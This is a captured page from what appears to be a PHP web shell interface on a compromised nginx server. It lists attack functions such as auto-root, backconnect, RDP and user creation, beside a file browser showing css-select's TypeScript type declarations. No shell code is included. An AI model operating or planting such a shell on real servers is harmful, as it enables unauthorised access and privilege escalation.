Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
css-select /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
pseudo-selectors
[ DIR ]
dr-xr-xr-x
attributes.d.ts
427
B
-rw-rw-rw-
attributes.d.ts.map
453
B
-rw-rw-rw-
attributes.js
7.36
KB
-rw-rw-rw-
compile.d.ts
962
B
-rw-rw-rw-
compile.d.ts.map
878
B
-rw-rw-rw-
compile.js
4.44
KB
-rw-rw-rw-
general.d.ts
423
B
-rw-rw-rw-
general.d.ts.map
455
B
-rw-rw-rw-
general.js
5.68
KB
-rw-rw-rw-
index.d.ts
3.21
KB
-rw-rw-rw-
index.d.ts.map
875
B
-rw-rw-rw-
index.js
6.69
KB
-rw-rw-rw-
procedure.d.ts
279
B
-rw-rw-rw-
procedure.d.ts.map
348
B
-rw-rw-rw-
procedure.js
491
B
-rw-rw-rw-
sort.d.ts
333
B
-rw-rw-rw-
sort.d.ts.map
237
B
-rw-rw-rw-
sort.js
2.46
KB
-rw-rw-rw-
types.d.ts
4.71
KB
-rw-rw-rw-
types.d.ts.map
2.72
KB
-rw-rw-rw-
types.js
77
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types.d.ts
import type { Selector } from "css-what"; export declare type InternalSelector = Selector | { type: "_flexibleDescendant"; }; export declare type Predicate<Value> = (v: Value) => boolean; export interface Adapter<Node, ElementNode extends Node> { /** * Is the node a tag? */ isTag: (node: Node) => node is ElementNode; /** * Does at least one of passed element nodes pass the test predicate? */ existsOne: (test: Predicate<ElementNode>, elems: Node[]) => boolean; /** * Get the attribute value. */ getAttributeValue: (elem: ElementNode, name: string) => string | undefined; /** * Get the node's children */ getChildren: (node: Node) => Node[]; /** * Get the name of the tag */ getName: (elem: ElementNode) => string; /** * Get the parent of the node */ getParent: (node: ElementNode) => ElementNode | null; /** * Get the siblings of the node. Note that unlike jQuery's `siblings` method, * this is expected to include the current node as well */ getSiblings: (node: Node) => Node[]; /** * Returns the previous element sibling of a node. */ prevElementSibling?: (node: Node) => ElementNode | null; /** * Get the text content of the node, and its children if it has any. */ getText: (node: Node) => string; /** * Does the element have the named attribute? */ hasAttrib: (elem: ElementNode, name: string) => boolean; /** * Takes an array of nodes, and removes any duplicates, as well as any * nodes whose ancestors are also in the array. */ removeSubsets: (nodes: Node[]) => Node[]; /** * Finds all of the element nodes in the array that match the test predicate, * as well as any of their children that match it. */ findAll: (test: Predicate<ElementNode>, nodes: Node[]) => ElementNode[]; /** * Finds the first node in the array that matches the test predicate, or one * of its children. */ findOne: (test: Predicate<ElementNode>, elems: Node[]) => ElementNode | null; /** * The adapter can also optionally include an equals method, if your DOM * structure needs a custom equality test to compare two objects which refer * to the same underlying node. If not provided, `css-select` will fall back to * `a === b`. */ equals?: (a: Node, b: Node) => boolean; /** * Is the element in hovered state? */ isHovered?: (elem: ElementNode) => boolean; /** * Is the element in visited state? */ isVisited?: (elem: ElementNode) => boolean; /** * Is the element in active state? */ isActive?: (elem: ElementNode) => boolean; } export interface Options<Node, ElementNode extends Node> { /** * When enabled, tag names will be case-sensitive. * * @default false */ xmlMode?: boolean; /** * Lower-case attribute names. * * @default !xmlMode */ lowerCaseAttributeNames?: boolean; /** * Lower-case tag names. * * @default !xmlMode */ lowerCaseTags?: boolean; /** * Is the document in quirks mode? * * This will lead to .className and #id being case-insensitive. * * @default false */ quirksMode?: boolean; /** * The last function in the stack, will be called with the last element * that's looked at. */ rootFunc?: (element: ElementNode) => boolean; /** * The adapter to use when interacting with the backing DOM structure. By * default it uses the `domutils` module. */ adapter?: Adapter<Node, ElementNode>; /** * The context of the current query. Used to limit the scope of searches. * Can be matched directly using the `:scope` pseudo-selector. */ context?: Node | Node[]; /** * Allow css-select to cache results for some selectors, sometimes greatly * improving querying performance. Disable this if your document can * change in between queries with the same compiled selector. * * @default true */ cacheResults?: boolean; } export interface InternalOptions<Node, ElementNode extends Node> extends Options<Node, ElementNode> { adapter: Adapter<Node, ElementNode>; equals: (a: Node, b: Node) => boolean; } export interface CompiledQuery<ElementNode> { (node: ElementNode): boolean; shouldTestNextSiblings?: boolean; } export declare type Query<ElementNode> = string | CompiledQuery<ElementNode> | Selector[][]; export declare type CompileToken<Node, ElementNode extends Node> = (token: InternalSelector[][], options: InternalOptions<Node, ElementNode>, context?: Node[] | Node) => CompiledQuery<ElementNode>; //# sourceMappingURL=types.d.ts.map
Close